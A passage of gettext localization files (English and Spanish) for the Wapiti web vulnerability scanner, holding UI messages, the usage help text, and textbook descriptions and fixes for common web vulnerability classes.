msgstr "Forms" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Form {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Method: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Inputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Selects:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * TextAreas:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Report for {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Date of the scan : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Scope of the scan : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Summary of vulnerabilities :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Evil request:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "cURL command PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalies found:" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Attack process interrupted. To perform again the attack, launch Wapiti with \"-i\" or \"-k\" parameter." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "File {0} not found. Wapiti will scan the web site again" msgid "[!] Unable to find a module named {0}" msgstr "[!] Unable to find a module named {0}" msgid "Backup file description" msgstr "" "It may be possible to find backup files of scripts on the webserver that " "the web-admin put here to save a previous version or backup files that are " "automaticallygenerated by the software editor used (like for example Emacs). " "These copies may reveal interesting informations like source code or " "credentials" msgid "Backup file solution" msgstr "" "The webadmin must manually delete the backup files or remove it from the web " "root. He should also reconfigure its editor to deactivate automatic backups." msgid "Blind SQL Injection description" msgstr "" "Blind SQL injection is a technique that exploits a vulnerability occurring " "in the database of an application. This kind of vulnerability is harder to " "detect than basic SQL injections because no error message will be displayed " "on the webpage." msgid "Blind SQL Injection solution" msgstr "" "To protect against SQL injection, user input must not directly be embedded " "in SQL statements. Instead, user input must be escaped or filtered or " "parameterized statements must be used." msgid "Commands execution description" msgstr "" "This attack consists in executing system commands on the server. The " "attacker tries to inject this commands in the request parameters" msgid "Commands execution solution" msgstr "Prefer working without user input when using file system calls" msgid "CRLF description" msgstr "" "The term CRLF refers to Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, " "\\n). They're used to note the termination of a line, however, dealt with " "differently in today's popular Operating Systems. For example: in Windows " "both a CR and LF are required to note the end of a line, whereas in Linux/" "UNIX a LF is only required. This combination of CR and LR is used for " "example when pressing 'Enter' on the keyboard. Depending on the application " "being used, pressing 'Enter' generally instructs the application to start a " "new line, or to send a command." msgid "CRLF solution" msgstr "" "Check the submitted parameters and do not allow CRLF to be injected by " "filtering CRLF" msgid "Cross Site Scripting description" msgstr "" "Cross-site scripting (XSS) is a type of computer security vulnerability " "typically found in web applications which allow code injection by malicious " "web users into the web pages viewed by other users. Examples of such code " "include HTML code and client-side scripts." msgid "Cross Site Scripting solution" msgstr "" "The best way to protect a web application from XSS attacks is ensure that " "the application performs validation of all headers, cookies, query strings, " "form fields, and hidden fields. Encoding user supplied output in the server " "side can also defeat XSS vulnerabilities by preventing inserted scripts from " "being transmitted to users in an executable form. Applications can gain " "significant protection from javascript based attacks by converting the " "following characters in all generated output to the appropriate HTML entity " "encoding: <, >, &, ", ', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "This attack is also known as Path or Directory Traversal, its " "aim is the access to files and directories that are stored outside the web " "root folder. The attacker tries to explore the directories stored in the web " "server. The attacker uses some techniques, for instance, the manipulation of " "variables that reference files with 'dot-dot-slash (../)' sequences and its " "variations to move up to root directory to navigate through the file system." msgid "File Handling solution" msgstr "" "Prefer working without user input when using file system calls. Use " "indexes rather than actual portions of file names when templating or using " "language files (eg: value 5 from the user submission = Czechoslovakian, " "rather than expecting the user to return 'Czechoslovakian'). Ensure the " "user cannot supply all parts of the path - surround it with your path code. " "Validate the user's input by only accepting known good - do not sanitize " "the data. Use chrooted jails and code access policies to restrict where " "the files can be obtained or saved to." msgid "Htaccess bypass description" msgstr "" "htaccess files are used to restrict access to some files or HTTP method. In " "some case it may be possible to bypass this restriction and access the files." msgid "Htaccess bypass solution" msgstr "Make sure every HTTP method is forbidden if the credentials are bad." msgid "Internal server error description" msgstr "An error occured on the server's side, preventing it to process the request. It may be the sign of a vulnerability." msgid "Internal server error solution" msgstr "More information about the error should be found in the server logs." msgid "Potentially dangerous file description" msgstr "A file with potential vulnerabilities has been found on the website." msgid "Potentially dangerous file solution" msgstr "Make sure the script is up-to-date and restrict access to it if possible" msgid "Resource consumption description" msgstr "It took an abnormal time to the server to respond to a query. An attacker might leverage this kind of weakness to overload the server" msgid "Resource consumption solution" msgstr "The involved script is maybe using the server resources (CPU, memory, network, file access...) in a non-efficient way" msgid "SQL Injection description" msgstr "" "SQL injection vulnerabilities allow an attacker to alter the queries executed on the backend database. " "An attacker may then be able to extract or modify informations stored in the database or even escalate his privileges on the system." msgid "SQL Injection solution" msgstr "" "To protect against SQL injection, user input must not directly be embedded " "in SQL statements. Instead, user input must be escaped or filtered or " "parameterized statements must be used." wapiti-2.3.0+dfsg/wapitiCore/language_sources/es.po000066400000000000000000000662511240201516300223370ustar00rootroot00000000000000# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: 2013-09-17 23:16+0200\n" "Last-Translator: David del Pozo Gonzalez \n" "Language-Team: David del Pozo Gonzalez \n Alberto Pastor Nieto " "Language: Spanish\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " URL maliciosa: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} en {1} mediante inyección en el parámetro {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " viniendo de {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} en {1} mediante inyección en la query de la URL" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} en {1} mediante inyección en la ruta al recurso" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Parámetro involucrado: {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Petición maliciosa:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "Inyección SQL" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Inyección SQL a ciegas" #: ../vulnerability.py:69 msgid "File Handling" msgstr "Manejo de fichero" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross Site Scripting" #: ../vulnerability.py:71 msgid "CRLF" msgstr "CRLF" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Ejecución de comandos" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Bypass de Htaccess" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Fichero de backup" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Fichero potencialmente peligroso" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Error interno del servidor" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Consumo de recursos" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Recibido un error HTTP 500 en {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Timeout ocurrido en {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la query de la URL" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en la ruta al recurso" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "Timeout en la petición cuando se intentaba realizar inyectar una cadena maliciosa en el parámetro {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en la query de la URL" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" msgstr "El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el resource path" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "El servidor devolvió un error HTTP 500 cuando se intentaba inyectar una cadena maliciosa en el parámetro {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Argumento inválido para la opción {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Cargando modulos:" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "No se han encontrado enlaces ni formularios en esta página" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Compruebe que la URL es correcta." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Dependencias no encontradas para el módulo {0}:" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Lanzando módulo {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Scripts de subida encontrados:" #: ../wapiti.py:335 msgid "Report" msgstr "Informe" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "Se ha generado un informe en el fichero {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Abrir {0}/index.html con el navegador para ver el informe" #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Web application vulnerability scanner \n" " \n" " Uso: python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Las opciones soportadas son: \n" " -s \n" " --start \n" " \tPara indicar una URL con la que comenzar el escaneo. Esta opción puede ser usada varias veces.\n" " \tWapiti escaneará esos enlaces para encontrar más URLs incluso si el enlace especificado no está en el ámbito.\n" " \n" " -x \n" " --exclude \n" " \tPara excluir una URL del escaneo (por ejemplo URLs de logout). Esta opción puede ser llamada varias veces para especificar varias URLs.\n" " \tLos comodines (*) se pueden usar en las URL como si fuesen expresiones regulares simples.\n" " \tEjemplo : -x http://server/base/?page=*&module=test\n" " \to -x http://server/base/admin/* para excluir un directorio.\n" " \n" " -p \n" " --proxy \n" " \tPara especificar un proxy. Actualmente los proxies soportados son HTTP y HTTPS.\n" " \tEsta opción puede ser llamada dos veces para especificar el proxy HTTP y HTTPS.\n" " \tEjemplo: -p http://proxy:port/\n" " \n" " -c \n" " --cookie \n" " \tPara importar cookies que se usarán en el escaneo. La cookie debe ser un fichero en formato JSON.\n" " \tLas cookies pueden ser generadas usando los programas cookie.py y getcookie.py (directorio \"net\").\n" " \n" " -t \n" " --timeout \n" " \tPara establecer un timeout (tiempo máximo en segundo a esperar a la respuesta del servidor).\n" " \n" " -a \n" " --auth \n" " \tEstablece las credenciales para la autentificación HTTP.\n" " \n" " --auth-method \n" " \tSi el servidor requiere autenticación, establece el método a usar en la autenticación.\n" " \tActualmente los métodos soportados son (algunos requieren instalar módulos adicionales):\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tBorra un parámetro (nombre y valor) de las URLs.\n" " \n" " -n \n" " --nice \n" " \tDefine un límite de URLs a escanear con el mismo patrón (por ejemplo, el número máximo de valores únicos para el mismo parámetro).\n" " \tUsa esta opción para prevenir bucles infinitos durante el escaneo. El límite debe ser mayor que 0.\n" " \n" " -m \n" " --module \n" " \tEstablece los módulos (y métodos HTTP para cada módulo) para usar en los ataques.\n" " \tPrefix a module name with a dash to deactivate the related module.\n" " \tTo only browse the target (without sending any payloads), deactivate every module with -m \"-all\".\n" " \tIf you don't specify the HTTP methods, GET and POST will be used.\n" " \tExample: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tUsa colores para resaltar las vulnerabilidades y anomalias en la salida. \n" " \n" " -v \n" " --verbose \n" " \tEstablece el nivel de logs por pantalla. \n" " \t0: bajo (por defecto), 1: pinta cada URL, 2: pinta cada ataque. \n" " \n" " -b \n" " --scope \n" " \tEstablece el ámbito del escaneo:\n" " \t\t+ page: analiza solo la página pasada a Wapiti como URL raíz.\n" " \t\t+ folder: analiza todas las URL bajo la misma URL raíz pasado a Wapiti (por defecto).\n" " \t\t+ domain: analiza todos los enlaces a páginas que están en el mismo dominio que la URL pasada a Wapiti.\n" " \n" " -f \n" " --format \n" " \tEstablece el formato del informe. \n" " \tjson: Formato JSON format \n" " \thtml: Formato HTML format (default)\n" " \topenvas: Formato OpenVAS XML \n" " \ttxt: Informe en texto plano (UTF-8) \n" " \tvulneranet: Informe en formato VulneraNET (basado en XML)\n" " \txml: Formato XML\n" " \n" " -o \n" " --output \n" " \tEstablece el nombre del fichero con el informe. \n" " \tSi se selecciona HTML como formato del informe, este parámetro será el nombre del directorio donde se guarda el informe.\n" " \n" " -i \n" " --continue \n" " \tEste parámetro indica a Wapiti reanudar el escaneo previo guardado en el fichero XML especificado\n" " \tEl nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta \"scans\".\n" " \n" " -k \n" " --attack \n" " \tEste parámetro indica a Wapiti reanudar los ataques sin escanear de nuevo el website, cargando el escaneo del fichero especificado.\n" " \tEl nombre del fichero es opcional, si no se especifica Wapiti toma el fichero por defecto de la carpeta \"scans\".\n" " \n" " --verify-ssl <0|1>\n" " \tEste parámetro indica si Wapiti debe comprobar certificados SSL.\n" " \tPor defecto se verifican los certificados\n" " \n" " -h \n" " --help \n" " \tPara imprimir este mensaje de uso de la aplicación\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Archivo {0} cargado. Wapiti lo usará para realizar el ataque" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "error: {0} mientras se realizaba el ataque {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "error: timeout mientras se atacaba {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} de {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "¡Encontrado fichero de backup!" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Fichero de backup {0} encontrado para {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Inyección SQL ciega" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} mediante inyección en la query de la URL" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} mediante inyección en el parámetro {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF injection" msgstr "Inyección CRLF" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Error: El servidor no entendió esta petición" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Ejecución de comando" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "Evaluación PHP" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Warning exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "Inyección preg_replace" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Warning usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Warning assert" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Evalutation warning" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Vulnerabilidad de inclusión remota" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Vulnerabilidad 'Local file disclosure' en Linux" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "Vulnerabilidad de 'Local file disclosure' en BSD" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Vulnerabilidad de 'Local file disclosure' en Windows" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Vulnerabilidad de 'Local file disclosure' en include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "Vulnerabilidad highlight_file() en basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() de fichero en include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Posible vulnerabilidad {0}" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "Protección HtAccess encontrada: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Code: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Código fuente:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "HtAccess {0}" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " Vulnerabilidad de bypass de .htaccess: {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "|Código HTTP: {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Problema con la base de datos local Nikto" #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Descargando de la web..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Error descargando la base de datos Nikto" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Referencias:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Guardada vulnerabilidad XSS" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Encontrada XSS permanente en {0} con {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Encontrado XSS permanente atacando {0} con campos {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "Inyección MySQL" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Inyección SQL en sistema Access" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "Inyección MSSQL" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Inyección Java.SQL" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "Inyección PostgreSQL" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "Inyección XPath" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "Inyección LDAP" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "Inyección DB2" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Inyección Interbase" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Inyección Sybase" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr "Inyección .NET SQL" #: ../attack/mod_sql.py:72 msgid "Acess-Based SQL Injection" msgstr "Inyección Acess-Based SQL" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Inyección Oracle" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "Vulnerabilidad XSS" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "Vulnerabilidad XSS encontrada mediante inyección en la ruta al recurso" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "Vulnerabilidad XSS encontrada mediante inyección en la query de la URL" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "Vulnerabilidad XSS encontrada mediante inyección en el parámetro {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "No se han encontrado formularios en esta página" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Elige el formulario que deseas usar:" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Elige un número:" #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Por favor, introduce valores para este formulario: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Error recuperando la URL {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "El primer argumento debe ser la URL raíz" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Protocolo inválido: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "En argumento no es un enlace válido: {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Conexión rechazada!" #: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Excepción en lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Archivo {0} cargado, el escaneo continua:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs a escanear" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URL escaneadas" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Fichero {0} no encontrado, Wapiti escaneará el website de nuevo" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Aviso" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Este escaneo se ha guardado en el archivo {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Puedes usarlo para realizar ataques sin escanear de nuevo el website mediante el parámetro \"-k\"" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Escaneo detenido, la información se ha salvado en el archivo {0}/{1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Para continuar con este escaneo, debes lanzar Wapiti con el parámetro \"-i\"" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Información de los formularios" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "De: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "A: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Subida de scripts" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Formularios" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Formulario {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Método: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Inputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Selects:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * TextAreas:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLs" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Informe para {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Fecha del escaneo: {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Ámbito del escaneo: {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Resumen de vulnerabilidades" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Petición maliciosa:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "cURL command PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalias encontradas" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Proceso de ataque interrumpido. Para realizar el ataque de nuevo lance Wapiti con los parámetros \"-i\" o \"-k\"." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Archivo {0} no encontrado. Wapiti escaneará el website de nuevo" msgid "[!] Unable to find a module named {0}" msgstr "[!] Imposible encontrar el módulo llamado {0}" msgid "Backup file description" msgstr "" "Es posible que se encuentren archivos de backup de los comandos " "ejecutados en el servidor que el administrador dejó para guardar una " "versión anterior o archivos de copia de seguridad que se generan " "automáticamente por editores de texto (como por ejemplo, Emacs). " "Estas copias pueden revelar código fuente o contraseñas." msgid "Backup file solution" msgstr "" "El administrador necesita borrar la copia de seguridad o moverla fuera de los " "directorios de la aplicación web. También debe desactivar las copias de seguridad " "automáticas en la configuración del editor de texto." msgid "Blind SQL Injection description" msgstr "" "La inyección SQL a ciegas es una técnica que se aprovecha de una vulnerabilidad " "en la base de datos de la aplicación. Este tipo de vulnerabilidad es más " "difícil de detectar que una inyección SQL clásica ya que no muestra ningún " "mensaje en la web." msgid "Blind SQL Injection solution" msgstr "" "Para proteger una aplicación de una inyección SQL, el usuario no debe utilizar " "consultas SQL directamente en el código. Los parámetros suministrados por el " "usuario deben ser escapados y filtrados. Las consultas deben estar parametrizadas." msgid "Commands execution description" msgstr "" "Este ataque consiste en ejecutar comandos del sistema en el servidor. El " "atacante trata de inyectar comandos en los parámetros de la petición." msgid "Commands execution solution" msgstr "" "Se debe evitar utilizar parámetros suministrados por el usuario en las " "llamadas al sistema de ficheros." msgid "CRLF description" msgstr "" "El término CRLF se refiere a 'Carriage Return (ASCII 13, \\r) Line Feed " "(ASCII 10, \\n)' (en inglés). Esos caracteres se utilizan para indicar el " "final de una línea, sin embargo no todos los sistemas operativos los interpretan " "de la misma forma. Por ejemplo, en Windows, ambos, CR y LF son necesarios para " "marcar el final de la línea, mientras que en Linux/UNIX sólo LF es necesario. La " "combinación de CR y LF es usada por ejemplo cuando se presiona 'Enter'. " "Dependiendo de la aplicación, presionar 'Enter' crea una nueva línea o " "ejecuta un comando." msgid "CRLF solution" msgstr "" "Comprobar los parámetros suministrados por el usuario y filtrar CR y LF." msgid "Cross Site Scripting description" msgstr "" "Cross-site scripting (XSS) es un tipo de vulnerabilidad que normalmente se " "encuentra en aplicaciones web que permiten la inyección de código malicioso " "en páginas que son vistas por otros usuarios. Un ejemplo es la inyección de " "código HTML y javascript." msgid "Cross Site Scripting solution" msgstr "" "La mejor forma de proteger una aplicación web de ataques XXS es asegurarse " "de que la aplicación valida todas las cabeceras, las cookies y todos los " "campos de los formularios (visibles y ocultos) que son enviados al servidor. " "También se debe validar toda la información que se manda al usuario desde el servidor " "para evitar que scripts inyectados puedan ejecutarse en los navegadores de otros usuarios. " "Una buena forma de proteger aplicaciones web de este tipo de ataques es convertir " "los siguientes caracteres en su equivalente en HTML: <, >, &, ", " "', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "Este ataque también se conoce como 'Path Transversal' o 'Directory Transversal'. " "Su objetivo es acceder a ficheros y directorios que se encuentran fuera del " "directorio de la aplicación web. El atacante es capaz de acceder a los directorios " "del servidor utilizando distintas técnicas como por ejemplo la manipulación de " "variables que referencian a ficheros con secuencias de '../' para moverse por los " "directorios del servidor." msgid "File Handling solution" msgstr "" "Evite trabajar con información suministrada por el usuario cuando haga llamadas " "al sistema de ficheros. Use índices en vez de nombres o partes del nombre de los " "ficheros. Por ejemplo, utilice idioma=5 para acceder a la página en sueco en " "vez de utilizar idioma=sueco. Valide todos los parámetros suministrados por el " "usuario chequeando una lista de valores posibles. Utilice 'chrooted jails' y " "restrinja el acceso de los ficheros adecuadamente." msgid "Htaccess bypass description" msgstr "" "Los ficheros htaccess se usan para restringir el acceso de algunos ficheros o " "métodos HTTP. En algunos casos, es posible saltarse esta protección y acceder " "a los ficheros." msgid "Htaccess bypass solution" msgstr "Asegúrese de que todas las llamadas HTTP se prohiben en el caso en el que las credenciales sean incorrectas." msgid "Internal server error description" msgstr "Un error en el servidor que evita que se procese la petición puede ser una señal de que existe una vulnerabilidad." msgid "Internal server error solution" msgstr "Investigue los logs del servidor en busca de información más detallada sobre el error." msgid "Potentially dangerous file description" msgstr "Un fichero con vulnerabilidades se ha encontrado en el sitio web." msgid 